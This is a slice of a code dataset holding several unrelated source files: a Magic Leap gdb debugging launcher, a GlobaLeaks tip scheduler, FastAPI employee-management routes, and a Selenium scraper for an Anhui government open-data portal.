zipfile.ZipFile(package, 'r') as zin:\n for item in zin.infolist():\n if item.filename == 'manifest.xml':\n manifest_content = zin.read(item.filename)\n return _extract_package_name_manifest(manifest_content)\n except Exception as ex:\n error(\"Failed extract package name from '%s' because of %s\" % (package, str(ex)))\n\n error(\"package %s does not contain mandatory manifest.xml\" % package)\n\n\ndef _host_is_windows():\n return sys.platform.startswith(\"win\")\n\n\nclass ArgumentParser(mldb.ArgumentParser):\n DESCRIPTION = \"\"\"\nLaunches a Magic Leap application in gdb\n\nExample usage:\n To deploy, launch and debug mpk:\n debug --deploy-mpk ~/myproj/.out/myproj/com.acme.myproj.mpk ~/myproj/.out/debug_lumin_clang-3.8_aarch64/myexe\n\n To launch and debug already deployed app:\n debug --package com.acme.myproj ~/myproj/.out/debug_lumin_clang-3.8_aarch64/myexe\n\n To debug already running app:\n debug --attach --package com.acme.myproj ~/myproj/.out/debug_lumin_clang-3.8_aarch64/myexe\n\n\nNote:\n - you will see some noise regarding SIGSTOP at the outset of the debug session. This\n is a consequence of how the platform launches the application for debugging. It\n will not affect either the application or your ability to debug it.\n\"\"\"\n\n def __init__(self):\n super(ArgumentParser, self).__init__(description=self.DESCRIPTION)\n\n required_group = self.add_argument_group(\"required options\")\n required_group.add_argument(\n dest=\"program\",\n help=\"Executable file. Should contain debug info or a link to a sym file.\\nThis argument should not be a pure sym file\")\n\n # The --deploy option is deprecated in favor of --deploy-mpk\n # It is supported in order to maintain backward compatibility\n self.add_argument(\n \"--deploy\", action=\"store_true\",\n help=argparse.SUPPRESS)\n\n self.add_argument(\n \"--verbose\", \"-v\", action=\"store_true\",\n help=\"enable verbose mode\")\n\n debug_group = self.add_argument_group(\"optional debugging options\")\n debug_group.add_argument(\n \"--deploy-mpk\", dest=\"deploy_mpk\",\n help=\"deploy the application package (mpk) to the device\")\n\n debug_group.add_argument(\n \"--force\", action=\"store_true\",\n help=\"kill existing debug session if it exists\")\n\n debug_group.add_argument(\n \"--attach\", action='store_true',\n help=\"attach to the running process\")\n\n debug_group.add_argument(\n \"--env\", action='append',\n help=\"pass an environment variable to a debuggable application\")\n\n debug_group.add_argument(\n \"--setup-only\", dest=\"setup_only\", action='store_true',\n help=\"create GDB command file and launch gdbserver on the device, but don't launch GDB client\")\n\n debug_group.add_argument(\n \"--port\", dest=\"port\", type=int, default=\"7777\",\n help=\"override port used on the host. Default is 7777\")\n\n debug_group.add_argument(\n \"-x\", \"--exec\", dest=\"gdb_cmd_file\",\n help=\"file containing gdb commands to run after establishing connection\")\n\n debug_group.add_argument(\n \"-p\", \"--package\", dest=\"package\",\n help=\"package name\")\n\n debug_group.add_argument(\n \"--sopaths\", dest=\"sopaths\",\n help=\"list of paths to shared libraries you want to debug. The list should be separated by colon (:) on Linux and MacOS or semicolon (;) on Windows.\")\n\n debug_group.add_argument(\n \"-c\", \"--component\", dest=\"component\",\n help=\"application component. Defaults to first component in manifest.xml if not specified\")\n\n if _host_is_windows():\n tui_help = argparse.SUPPRESS\n no_console_help = \"start gdb in main window\"\n else:\n tui_help = \"use GDB's tui mode\"\n no_console_help = argparse.SUPPRESS\n\n debug_group.add_argument(\n \"-t\", \"--tui\", action=\"store_true\", dest=\"tui\",\n help=tui_help)\n\n debug_group.add_argument(\n \"--no_console\", action=\"store_true\",\n help=no_console_help)\n\n debug_group.add_argument(\n \"-i\", \"--init_str\", dest=\"init_str\",\n help=\"application initialization string\")\n\n\ndef _tools_path():\n # path of debug.py: tools/debug/debug.py\n return os.path.join(os.path.dirname(os.path.realpath(__file__)), '..')\n\n\ndef gdb_bin_path():\n return os.path.join(_tools_path(), 'toolchains', 'bin')\n\n\ndef handle_args():\n args = ArgumentParser().parse_args()\n\n if args.tui and _host_is_windows():\n error(\"TUI is unsupported on Windows.\")\n\n if not os.path.isfile(args.program):\n error(\"File not found: '{}'.\".format(args.program))\n\n if args.verbose:\n logger = logging.getLogger(__name__)\n handler = logging.StreamHandler(sys.stdout)\n formatter = logging.Formatter()\n\n handler.setFormatter(formatter)\n logger.addHandler(handler)\n logger.propagate = False\n\n logger.setLevel(logging.INFO)\n\n return args\n\n\n# download a file from device to host.\ndef download_file(args, device_path, host_path, pkg_name):\n device = args.device\n return device.pull(device_path, host_path, package=pkg_name)\n\n\n# Check if the device is running Lumin OS build before the given id.\n# helper for allowing compatibility code to address issues in older devices\ndef _lumin_version_before(device, lumin_nightly_build_id):\n\n device_version = device.get_prop(\"ro.build.id\")\n # Recognize the \"N03.123\" nightly build pattern, treat anything else as new.\n m = re.match(\"^N03.([0-9]+)$\", device_version)\n return m and int(m.group(1)) < lumin_nightly_build_id\n\n\ndef _get_continue_cmd(args):\n if args.attach or args.setup_only:\n # Not needed for an attach setup or \"--setup-only\" launch (Visual Studio debug)\n return \"\"\n\n if _lumin_version_before(args.device, 112):\n # Compatibility with devices before N03.112, did not use attach for debug.\n return \"\"\n\n # To debug the application from the beginning, \"mldb start -d\" sends a SIGSTOP\n # to the application so that when gdbserver attaches, the app is still at the beginning.\n # This signal causes that 3 gdb continue operations are needed to resume it initially,\n # more precisely one continue and one \"signal 0\" (which ignores the SIGSTOP) also works,\n # but as we want the target to still be suspended when the user starts his session,\n # we do 2 continues at startup.\n return \"gdb.execute('continue')\\ngdb.execute('continue')\\n\"\n\n\ndef generate_gdb_command_file(args, sysroot, sopaths, src_search_path):\n base_path = os.path.join(os.path.dirname(args.program), os.path.basename(args.program))\n base_path = base_path.replace(\"\\\\\", \"/\")\n if sopaths is None:\n sopaths = sysroot\n if src_search_path is None:\n src_search_path = sysroot # unlikely to help but worth a try\n\n continue_cmd = _get_continue_cmd(args)\n\n gdb_commands = \"\"\"\nset osabi GNU/Linux\nset debug aarch64\nset history save on\nset history filename {base_path}.gdb_history\n\n# Set this so that gdb can find the shared library files on host. Those files\n# usually contain symbol data (debug and/or symbol table).\nset solib-search-path {sopaths}\n\n# Sysroot provides a mapping for where to look for a loaded library on the host. \n# If the program loads /some/dir/libfoo.so and sysroot is c:\\mysrc, then gdb \n# will look for the file at c:\\mysrc\\some\\dir\\libfoo.so. When sysroot is not\n# set, gdb transfers the file up through gdbserver. This is wasteful if you have\n# the library on the host already.\nset sysroot {sysroot}\n\n# Set this so that gdb can find the source files if the paths in the debug info\n# aren't absolute or don't accurately reflect where the files are on host\ndirectory {directory}\n\npython\n\n# Python 2.7 compatibility\nfrom __future__ import print_function\n# Set up the pretty printer\nimport sys\nsys.path.append(\"{pypr_dir}\")\nfrom printers import register_libcxx_printers\nregister_libcxx_printers(None)\n\n# Try to connect for a few seconds, sometimes the device gdbserver takes\n# a little bit to come up.\ndef target_remote_with_retry(target, timeout_seconds):\n import time\n end_time = time.time() + timeout_seconds\n while True:\n try:\n gdb.execute('target remote ' + target)\n return True\n except gdb.error as e:\n time_left = end_time - time.time()\n if time_left < 0 or time_left > timeout_seconds:\n print(\"Error: unable to connect to device.\", file=sys.stderr)\n print(e, file=sys.stderr)\n return False\n time.sleep(min(0.25, time_left))\n\ntarget_remote_with_retry(':{port}', {connect_timeout})\n{continue_cmd}\nend\n\"\"\".format(base_path=base_path,\n sysroot=sysroot,\n sopaths=sopaths,\n directory=src_search_path,\n pypr_dir=args.pypr_dir.replace(\"\\\\\", \"/\"),\n port=args.port,\n connect_timeout=10,\n continue_cmd=continue_cmd)\n\n # Append the contents of the user's optional gdb command file\n if args.gdb_cmd_file is not None:\n try:\n user_cmd_file = open(args.gdb_cmd_file, \"r\")\n except IOError:\n error(\"Failed to open GDB command file: '{}'.\".format(args.gdb_cmd_file))\n\n with user_cmd_file:\n gdb_commands += user_cmd_file.read()\n\n # Write out the command file\n gen_cmd_file = os.path.join(base_path + '.gdbinit')\n log(\"Generating GDB command file \" + gen_cmd_file)\n\n with open(gen_cmd_file, \"w\") as f:\n f.write(gdb_commands)\n\n return gen_cmd_file\n\n\ndef start_gdb(gdb_path, program, command_file, gdb_flags=None, no_console=False):\n \"\"\"Start gdb in the background and block until it finishes.\n\n Args:\n gdb_path: Path of the gdb binary.\n program: Path of the program to debug.\n command_file: file name of the GDB script to run.\n gdb_flags: List of flags to append to gdb command.\n no_console: if True no separate console is created on Windows.\n \"\"\"\n\n gdb_args = [gdb_path, program, \"-x\", mldb.quote_path_if_needed(command_file)] + (gdb_flags or [])\n log(\"Starting GDB client... (\" + ' '.join(gdb_args) + \")\")\n\n kwargs = {}\n if _host_is_windows() and not no_console:\n kwargs[\"creationflags\"] = subprocess.CREATE_NEW_CONSOLE\n\n gdb_process = subprocess.Popen(gdb_args, **kwargs)\n while gdb_process.returncode is None:\n try:\n gdb_process.communicate()\n except KeyboardInterrupt:\n pass\n\n if gdb_process.returncode != 0:\n return_code_str = str(gdb_process.returncode)\n if gdb_process.returncode >= 0x80000000:\n return_code_str = hex(gdb_process.returncode)\n print(\"gdb failed (exit code %s)\" % return_code_str, file=sys.stderr)\n\n\ndef device_invocation(func, err_msg):\n \"\"\"\n Invokes [func] and catches subprocess.CalledProcessError, printing out the\n failure\n\n We use this for making calls to mldb where a user error is to be expected\n\n @param err_msg is the final error message to display (in addition to what's\n in the exception object)\n \"\"\"\n try:\n func()\n except subprocess.CalledProcessError as exc:\n print(\"ERROR: {}\\nERROR: {}\".format(str(exc), exc.output.decode('utf-8').strip()), file=sys.stderr)\n error(err_msg)\n\n\ndef _process_exists(device, pkg_name, component=None):\n out = device.ps(as_json=True)\n process_list = json.loads(out)\n for p in process_list:\n if p[\"package\"] != pkg_name:\n continue\n if component is None or p[\"component\"] == component:\n return True\n return False\n\n\ndef _terminate_application(device, pkg_name, component=None):\n \"\"\"\n Helper to terminate an application, if it is running.\n Allow to do this silently if it is not certain that the application is running.\n \"\"\"\n log(\"Terminating the %s application \" % pkg_name)\n try:\n device.terminate(pkg_name, component, force=True)\n # device.terminate is asynchronous, wait until device is not shown in mldb ps anymore\n for unused_retries in range(0, 20):\n if not _process_exists(device, pkg_name, component):\n break\n time.sleep(0.1) # 0.1 seconds, up to 2 seconds + processing time\n else:\n log(\"WARNING: %s still exists as process on target two seconds after a successful terminate request\" % pkg_name)\n\n except subprocess.CalledProcessError as exc:\n log(\"ERROR: {}\\nERROR: {}\".format(str(exc), exc.output.decode('utf-8').strip()))\n\n\ndef main():\n args = handle_args()\n device = args.device\n\n if device is None:\n error(\"mldb did not find any connected devices.\")\n\n mldb_version = mldb.version_str(device.mldb_cmd)\n log(\"MLDB command used: '{}'\".format(\" \".join(device.mldb_cmd)))\n log(\"MLDB version: {}\".format(\" \".join(mldb_version.splitlines())))\n\n pkg_name = None\n if args.attach:\n # Attach to running process\n if args.package is None:\n raise error(\"Must specify the package with --package.\")\n\n device_invocation(lambda: device.attach(args.package, host_port=args.port), \"Launch failed\")\n pkg_name = args.package\n else:\n # Launch application, possibly deploying first\n if args.deploy or args.deploy_mpk:\n if args.deploy_mpk:\n args_mpk = args.deploy_mpk\n else:\n args_mpk = args.package\n log(\"Deploying to device...\")\n # Package (mpk) installation\n if not os.path.isfile(args_mpk):\n error(\"File not found: '{}'.\".format(args_mpk))\n\n # Extract the package name from the manifest. We need it\n # for launching the\n package_name = _extract_package_name(args_mpk)\n\n # Do the install\n # This can be a long running operation (the package zip could be hundreds\n # of MBs), and mldb prints updates to stdout throughout the process. This\n # requires special handling for this mldb invocation. Typically we invoke\n # mldb, then print the output in bulk when the command completes. Here\n # we have to forward the stdout in realtime. Also, allow IDEs to reliably\n # find that output by printing markers before and after the operation.\n if args.verbose:\n print(\"=== INSTALL THROUGH MLDB: BEGIN ===\")\n last_line = \"\"\n\n def do_install():\n nonlocal last_line\n for line in device.install(args_mpk, replace=True, create_generator=True):\n # If the line contains the string 'Successfully' then the package has been installed and the line\n # should be printed on a new line. During the push of the package the progress report needs to\n # be displayed such that each line overwrites the previous line. By prefacing the string with the\n # '\\r' (Carriage Return) the cursor is returned to the beginning of the line and the next message\n # is printed over it. The print() function also must be passed \"end=''\" so that the New Line is not\n # printed. The standard output stream must be flushed in order for the last line to be output in\n # the console. (DTOOLS-2032)\n if not re.match(r'Successfully', line):\n print(\"\\r\" + line.strip(), end='')\n else:\n print(\"\\n\" + line.strip())\n last_line = line\n stdout.flush()\n device_invocation(do_install, \"Install failed\")\n\n if args.verbose:\n print(\"=== INSTALL THROUGH MLDB: END ===\")\n\n if not last_line.startswith(\"Successfully \"):\n error(\"mldb install printed unexpected output: \" + last_line)\n pkg_name = package_name\n else:\n pkg_name = args.package\n\n # Force all output out now. Fixes strange interleave output issue seen with test\n stdout.flush()\n\n # Workaround for launch -f not killing debugged application, stop it if it is already running.\n # Remove once issue is fixed.\n _terminate_application(device, pkg_name, args.component)\n\n device_invocation(lambda: device.launch(pkg_name, args.component, debug=True, host_port=args.port, env=args.env, init_str=args.init_str), \"Launch failed\")\n\n args.pypr_dir = os.path.join(\n gdb_bin_path(), \"..\", \"share\", \"pretty-printers\", \"libc++\", \"v1\")\n args.pypr_dir = os.path.realpath(args.pypr_dir) # canonicalize, for neatness\n if not os.path.isdir(args.pypr_dir):\n raise AssertionError(\"Malformed SDK. gdb pretty printer not found at: %s\" % args.pypr_dir)\n\n # default to directory of the program\n if \"ANDROID_BUILD_TOP\" in os.environ:\n sysroot = os.path.join(os.environ[\"OUT\"], \"symbols\")\n src_search_path = os.environ[\"ANDROID_BUILD_TOP\"]\n\n system_lib_dir = os.path.join(sysroot, \"system\", \"lib64\")\n vendor_lib_dir = os.path.join(sysroot, \"vendor\", \"lib64\")\n\n solib_search_path = []\n system_lib_subdirs = [\"\", \"hw\", \"drm\", \"soundfx\"]\n vendor_lib_subdirs = [\"\", \"hw\", \"egl\", \"mediadrm\"]\n if args.sopaths is None:\n solib_search_path += [os.path.join(system_lib_dir, x) for x in system_lib_subdirs]\n solib_search_path += [os.path.join(vendor_lib_dir, x) for x in vendor_lib_subdirs]\n solib_search_path = \":\".join(solib_search_path)\n else:\n solib_search_path = args.sopaths\n else:\n sysroot = os.path.dirname(args.program)\n sysroot = sysroot.replace(\"\\\\\", \"/\")\n if not sysroot:\n sysroot = \".\"\n solib_search_path = args.sopaths\n src_search_path = None\n\n # upload some system library files from device to host.\n #\n # Note the linker64 is required for GDB to debug shared libraries.\n #\n # The other library files are nice to have as they contain symbol table (not debug info) that\n # make stepping into a function in the libraries (e.g. printf() in libc) a better experience.\n # Without the files, say, libc.so, user can step into printf() but\n # 1. user will get no calling stack and\n # 2. user cannot step further (with \"step-mode\" off in GDB) or can step further but cannot step\n # out (with \"step-mode\" on in GDB) due to lack of calling stack. The only good choice for user to\n # get out of woods is to \"continue\".\n #\n # On the other hand we don't want to upload many shared libraries as\n # 1. that would slow down debugger start,\n # 2. Many libraries should not be uploaded to host for security reasons.\n #\n # So this file list is to-be-determined.\n # TODO: Maybe we want to get the file list from a file ?\n #\n files = [\"/system/bin/linker64\",\n \"/system/lib64/libc.so\"]\n\n for file in files:\n download_file(args, file, sysroot, pkg_name)\n\n # Generate the gdb command file\n command_file = generate_gdb_command_file(args, sysroot, solib_search_path, src_search_path)\n\n if not args.setup_only:\n # Start gdb.\n gdb_flags = []\n if args.tui:\n gdb_flags.append(\"--tui\")\n\n gdb_path = os.path.join(gdb_bin_path(), \"gdb\")\n gdb_path = os.path.realpath(gdb_path) # canonicalize, for neatness\n try:\n start_gdb(gdb_path, mldb.quote_path_if_needed(args.program), command_file, gdb_flags, no_console=args.no_console)\n finally:\n if not args.attach:\n # gdb does not kill the launched target as we attached gdbserver to an separately started process\n # Hence ensuring that the application is terminated.\n _terminate_application(device, pkg_name, args.component)\n\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"jfwallin/magicClassroom","sub_path":"common/mlsdk/v0.24.1/tools/debug/debug.py","file_name":"debug.py","file_ext":"py","file_size_in_byte":20893,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"5455662905","text":"# -*- coding: UTF-8\n#\n# tip_sched\n# *********\n#\n# Tip creation is an asyncronous operation, here implemented\n\nfrom globaleaks.utils import log\nfrom globaleaks.jobs.base import GLJob\nfrom datetime import datetime\nfrom twisted.internet.defer import inlineCallbacks\nfrom globaleaks.models.internaltip import InternalTip\nfrom globaleaks.models.externaltip import ReceiverTip, Comment\n\n__all__ = ['APSTip']\n\nclass APSTip(GLJob):\n\n @inlineCallbacks\n def operation(self):\n \"\"\"\n Goal of this function is to check all the InternalTip\n and create the Tips for the receiver needing.\n\n Create the ReceiverTip only, because WhistleBlowerTip is\n created when submission is finalized, along with the receipt\n exchange.\n\n Only the Receiver marked as first tier receiver has a Tip now,\n the receiver marked as tier 2 (if configured in the context)\n had their Tip only when the escalation_threshold has reached \n the requested value.\n \"\"\"\n log.debug(\"[D]\", self.__class__, 'operation', datetime.today().ctime())\n\n internaltip_iface = InternalTip()\n receivertip_iface = ReceiverTip()\n\n internal_id_list = yield internaltip_iface.get_newly_generated()\n\n if len(internal_id_list):\n log.debug(\"TipSched: found %d new Tip: %s\" % (len(internal_id_list), str(internal_id_list)))\n\n for id in internal_id_list:\n yield receivertip_iface.create_receiver_tips(id, 1)\n yield internaltip_iface.flip_mark(id, u'first')\n\n # loops over the InternalTip and checks the escalation threshold\n # It may require the creation of second-step Tips\n escalated_id_list = yield internaltip_iface.get_newly_escalated()\n\n if len(escalated_id_list):\n log.debug(\"TipSched: %d Tip are escalated: %s\" % (len(escalated_id_list), str(escalated_id_list)))\n\n # This event would be notified as system Comment\n comment_iface = Comment()\n\n for id in escalated_id_list:\n # yield comment_iface.add_comment(id, u\"Escalation threshold has been reached\", u'system')\n yield receivertip_iface.create_receiver_tips(id, 2)\n yield internaltip_iface.flip_mark(id, u'second')\n","repo_name":"Afridocs/GLBackend","sub_path":"globaleaks/jobs/tip_sched.py","file_name":"tip_sched.py","file_ext":"py","file_size_in_byte":2283,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"27272238203","text":"#Metadata values, this allows me to share the script if needed.\n\nno_value = \"no_value\"\n\ncommunity_analysis_to_keep_list = [\"all\"]\n\ncontrol_regions = [\"Blanks\", \"Positives\", \"Gblocks\", \"NTCs\", \"Unknowns\", \"TR\"]\n\nbatch_num_dict = { \"Run_1\":\"25-01-19\",\n \"Run_2\":\"15-01-19\",\n \"Run_3\":\"18-01-19\",\n \"Run_4\":\"21-01-19\",\n \"Run_5\":\"18-01-19\"\n }\n\n","repo_name":"Micro-Biology/biosys_py","sub_path":"example_metadata.py","file_name":"example_metadata.py","file_ext":"py","file_size_in_byte":433,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"35348487073","text":"from fastapi.responses import JSONResponse\n# from fastapi import APIRouter, Depends, HTTPException\nfrom starlette.status import HTTP_400_BAD_REQUEST\n\nfrom fastapi import APIRouter, Body, Depends, HTTPException, status, Request, Response, Header\nfrom fastapi.encoders import jsonable_encoder\nfrom typing import List\n# from app.core.utilscm import authrequire\n# from app.core.utilscm.authrequire import get_current_user\n# from app.callcache import dict_cache\nfrom app.models import common\nfrom app.models.category import employee, employeedb, managerdb, userInformationdb, userInformation, gatheringPointdb, \\\n transactionPointdb\n\nrouter = APIRouter()\n# security = HTTPBasic()\n\n\n@router.post(\"/insert\")\n# @authrequire.check_roles_required(roles_required=[\"admin\"])\nasync def insedrt(\n body: employee.employeeInsmodel = Body(..., embed=True),\nvalidate_token: str = Header(\"\")\n # current_user: dict = Depends(get_current_user),request : Request = None\n):\n # wrong_get_error = HTTPException(\n # status_code=HTTP_400_BAD_REQUEST,\n # detail=strings.INCORRECT_INPUT,\n # )\n try:\n encoded_body = jsonable_encoder(body)\n if encoded_body.get('type') == 'transaction' and \\\n 'transaction-point-manager' != common.getRoleFromToken(validate_token):\n raise Exception(\"Not authenticated\")\n if encoded_body.get('type') == 'transaction' and \\\n 'transaction-point-manager' != common.getRoleFromToken(validate_token):\n raise Exception(\"Not authenticated\")\n resp = employee.signUp(encoded_body, employeedb, managerdb)\n return JSONResponse(status_code=resp[0], content=resp[1])\n except Exception as e:\n return JSONResponse(status_code=400,content={\"message\" : str(e)})\n\n\n\n@router.post(\"/delete\")\n# @authrequire.check_roles_required(roles_required=[\"admin\"])\nasync def insedrt(\n body: employee.employeeDel = Body(..., embed=True),\nvalidate_token: str = Header(\"\")\n # current_user: dict = Depends(get_current_user),request : Request = None\n):\n # wrong_get_error = HTTPException(\n # status_code=HTTP_400_BAD_REQUEST,\n # detail=strings.INCORRECT_INPUT,\n # )\n try:\n encoded_body = jsonable_encoder(body)\n authorUser = common.getUserInfoByToken(validate_token, userInformationdb)\n try:\n employeeDeleled = list(employeedb.getModel().find({'username': encoded_body.get('username')}))[0]\n except:\n raise Exception('data not found')\n if authorUser[\"role\"] not in ['gathering-point-manager', 'transaction-point-manager', 'director']:\n raise Exception('No authorization')\n if employeeDeleled['managedBy'] != authorUser['username'] and authorUser[\"role\"] != 'director':\n raise Exception('No authorization')\n userInformation.companyMemberDeleteAccount(encoded_body.get('username'), 'transaction-point-employee', managerdb, employeedb)\n employeedb.getModel().delete_one({'username': encoded_body.get('username')})\n return JSONResponse(status_code=status.HTTP_200_OK, content={ 'deleted': encoded_body.get('username')})\n except Exception as e:\n return JSONResponse(status_code=400,content={\"message\" : str(e)})\n\n\n@router.get(\"/get\")\nasync def get():\n try:\n resp = list(employeedb.getModel().find())\n return JSONResponse(status_code=200,content=resp)\n except Exception as e:\n return JSONResponse(status_code=400,content={\"message\" : str(e)})\n\n@router.post(\"/get-employee-by-point\")\nasync def insedrt(\n body: employee.employeePointGetListModel = Body(..., embed=True),\nvalidate_token: str = Header(\"\")\n):\n try:\n encoded_body = jsonable_encoder(body)\n role = common.getRoleFromToken(validate_token)\n\n if role not in ['gathering-point-manager', 'transaction-point-manager', 'director']:\n raise Exception('No authorization')\n type = encoded_body.get('type')\n pointId = encoded_body.get('pointId')\n pagesize = encoded_body.get('pagesize')\n pageindex = encoded_body.get('pageindex')\n\n if role != 'director':\n authUser = common.getUserInfoByToken(validate_token, userInformationdb)\n try:\n thisManager = list(managerdb.getModel().find({\"username\": authUser[\"username\"]}))[0]\n except:\n raise Exception('manager not found')\n if thisManager['type'] != type or thisManager[\"pointManaged\"] != pointId:\n raise Exception('No authorization')\n\n resp = employee.getListEmployeeByPoint(type, pointId, pagesize, pageindex, employeedb)\n return JSONResponse(status_code=resp[0], content=resp[1])\n except Exception as e:\n return JSONResponse(status_code=400,content={\"message\": str(e)})\n\n\n@router.post(\"/get-employee-by-manager\")\nasync def insedrt(\n body: employee.employeeManagerGetListModel = Body(..., embed=True),\n validate_token: str = Header(\"\")\n):\n try:\n encoded_body = jsonable_encoder(body)\n role = common.getRoleFromToken(validate_token)\n\n if role not in ['gathering-point-manager', 'transaction-point-manager', 'director']:\n raise Exception('No authorization')\n type = encoded_body.get('type')\n managerId = encoded_body.get('managerId')\n pagesize = encoded_body.get('pagesize')\n pageindex = encoded_body.get('pageindex')\n\n if role != 'director':\n authUser = common.getUserInfoByToken(validate_token, userInformationdb)\n try:\n thisManager = list(managerdb.getModel().find({\"username\": authUser[\"username\"]}))[0]\n except:\n raise Exception('manager not found')\n if thisManager['type'] != type or authUser[\"username\"] != managerId:\n raise Exception('No authorization')\n\n resp = employee.getListEmployeeByManager(type, managerId, pagesize, pageindex, employeedb)\n return JSONResponse(status_code=resp[0], content=resp[1])\n except Exception as e:\n return JSONResponse(status_code=400, content={\"message\": str(e)})\n\n@router.post(\"/change-employee-point\")\nasync def insedrt(\n body: employee.changePoint = Body(..., embed=True),\nvalidate_token: str = Header(\"\")\n):\n try:\n encoded_body = jsonable_encoder(body)\n role = common.getRoleFromToken(validate_token)\n\n if role not in ['gathering-point-manager', 'transaction-point-manager', 'director']:\n raise Exception('No authorization')\n\n type = encoded_body.get('type')\n newPointId = encoded_body.get('newPointId')\n employeeId = encoded_body.get('employeeId')\n if not common.checkPointExist(newPointId, type, gatheringPointdb, transactionPointdb):\n raise Exception('Data not found')\n if role != 'director':\n raise Exception('No authorization')\n\n resp = employee.changePointEmployee(type, employeeId, newPointId, employeedb, gatheringPointdb, transactionPointdb)\n return JSONResponse(status_code=resp[0], content=resp[1])\n except Exception as e:\n return JSONResponse(status_code=400,content={\"message\": str(e)})\n\n","repo_name":"quangngoc21020550/MagicPostBackend","sub_path":"app/api/routes/category/employee.py","file_name":"employee.py","file_ext":"py","file_size_in_byte":7211,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"17074410544","text":"# -*- coding:utf-8 -*-\nfrom selenium import webdriver\nfrom bs4 import BeautifulSoup\nimport pandas as pd\nimport re\nimport json\nimport os\nimport time\nimport logging\nimport inspect\nfrom logging.handlers import RotatingFileHandler\n\n\ndir = os.path.dirname(os.path.dirname(__file__))\nhandlers = {\n logging.INFO: os.path.join(dir, 'log\\\\anhui_info.log'),\n logging.ERROR: os.path.join(dir, 'log\\\\anhui_error.log')\n }\nheaders = {'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) '\n 'AppleWebKit/537.36 (KHTML, like Gecko) '\n 'Chrome/70.0.3538.110 Safari/537.36'}\n\nclass TNLog(object):\n\n def printfNow(self):\n return time.strftime('%Y-%m-%d %H:%M:%S', time.localtime())\n\n def __init__(self, level=logging.NOTSET):\n self.__loggers = {}\n logLevels = handlers.keys()\n for level in logLevels:\n logger = logging.getLogger(str(level))\n logger.addHandler(handlers[level])\n logger.setLevel(level)\n self.__loggers.update({level: logger})\n\n def getLogMessage(self, level, message):\n frame, filename, lineNo, functionName, code, unknowField = inspect.stack()[2]\n '''日志格式:[时间] [类型] [记录代码] 信息'''\n return \"[%s] [%s] [%s - %s - %s] %s\" % (self.printfNow(), level, filename, lineNo, functionName, message)\n\n def info(self, message):\n message = self.getLogMessage(\"info\", message)\n self.__loggers[logging.INFO].info(message)\n\n def error(self, message):\n message = self.getLogMessage(\"error\", message)\n self.__loggers[logging.ERROR].error(message)\n\ndef createHandlers():\n logLevels = handlers.keys()\n\n for level in logLevels:\n path = os.path.abspath(handlers[level])\n handlers[level] = RotatingFileHandler(path, maxBytes=10000, backupCount=2, encoding='utf-8')\n\ndef anhui(url_path,save_path):\n logger.info('开始爬取安徽政务数据平台')\n url = url_path\n driver = webdriver.Chrome()\n driver.get(url)\n page=4\n login = input('按任意键继续') #登录、切换数据目录(和dataArea对应),分资源页爬取\n\n jsontemp=[]\n for i in range(1,page+1):\n logger.info('page'+str(i))\n html = driver.page_source\n soup = BeautifulSoup(html, 'html.parser')\n data = soup.find_all('div', attrs={'class': \"dataresources\"})\n data = str(data)\n partern_name = re.compile(r'target=\"_blank\" title=\"(.*?)\\n', re.S)\n name = re.findall(partern_name, data)\n partern_topic = re.compile(r'<span class=\"n3\">数据领域: (.*?) </span>', re.S)\n topic = re.findall(partern_topic, data)\n partern_desc = re.compile(r'<span class=\"zy\" title=\"(.*?)\">资源摘要', re.S)\n desc = re.findall(partern_desc, data)\n partern_time = re.compile(r'<span class=\"n1\">更新时间:(.*?)</span>', re.S)\n time_gx = re.findall(partern_time, data)\n print(name)\n logger.info(name)\n for index in range(len(name)):\n temp = dict()\n temp['name']=name[index]\n temp['topic'] = topic[index]\n temp['info']=dict()\n temp['info']['desc'] = desc[index]\n temp['info']['time'] = time_gx[index]\n logger.info(temp)\n if name[index] not in jsontemp:\n jsontemp.append(name[index])\n json_str = json.dumps(temp, ensure_ascii=False)\n with open(save_path, 'a', encoding='utf-8') as f:\n f.write(json_str)\n f.write('\\n')\n partern_id = re.compile(r'<a class=\"title\" href=\"/site/tpl/90\\?resourceId=(.*?)&', re.S)\n id = re.findall(partern_id, data)\n childrenurl = []\n urlroot1 = 'http://www.mas.gov.cn/site/tpl/90?resourceId='\n urlroot2 = '&p_isPage=1&p_pageSize=8&p_pageIndex=1&p_dataArea=2&p_providerOrgan=&p_dateFormat=yyyy-MM-dd&p_length=34&p_orderBy='\n for num in range(len(id)):\n childrenurl.append(urlroot1 + id[num] + urlroot2)\n for index, childurl in enumerate(childrenurl): ##一个数据的页面直接手点了\n driver.execute_script(\"window.open('{}')\".format(childurl)) # 打开子页面\n driver.switch_to.window(driver.window_handles[-1]) # 切换到子页面\n time.sleep(2)\n if i >= 1:\n try:\n driver.find_element_by_xpath(\"//*[text()='下载']\").click() # 点击下载\n time.sleep(5)\n try:\n download = '.csv'\n driver.find_element_by_partial_link_text(download).click() # 点击下载\n time.sleep(5)\n except:\n logger.error('无csv')\n try:\n download = '.xls'\n driver.find_element_by_partial_link_text(download).click() # 点击下载\n time.sleep(5)\n except:\n logger.error('无xls')\n try:\n download = '.json'\n driver.find_element_by_partial_link_text(download).click() # 点击下载\n time.sleep(5)\n except:\n logger.error('无json')\n except:\n logger.error('无文件')\n\n driver.close() # 关闭页面\n driver.switch_to.window(driver.window_handles[0]) # 返回主页面\n time.sleep(2)\n try:\n driver.find_element_by_xpath(\"//*[text()='下一页']\").click()\n time.sleep(10)\n except:\n driver.find_element_by_xpath(\"//*[text()='下一页']\").click()\n time.sleep(10)\n\nif __name__=='__main__':\n createHandlers()\n logger = TNLog()\n url_path='http://www.mas.gov.cn/site/tpl/72'\n save_path='../info/anhui.json'\n anhui(url_path,save_path)\n\n\n\n","repo_name":"Gyhfresh/web-crawler-master","sub_path":"platform/anhui.py","file_name":"anhui.py","file_ext":"py","file_size_in_byte":6052,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"26524272837","text":"import ujson as json\nfrom django.conf import settings\n\nfrom django.views.decorators.csrf import csrf_exempt\nfrom django.views.decorators.http import require_GET\n\nfrom blueapps.account.decorators import login_exempt\nfrom gcloud import err_code\nfrom 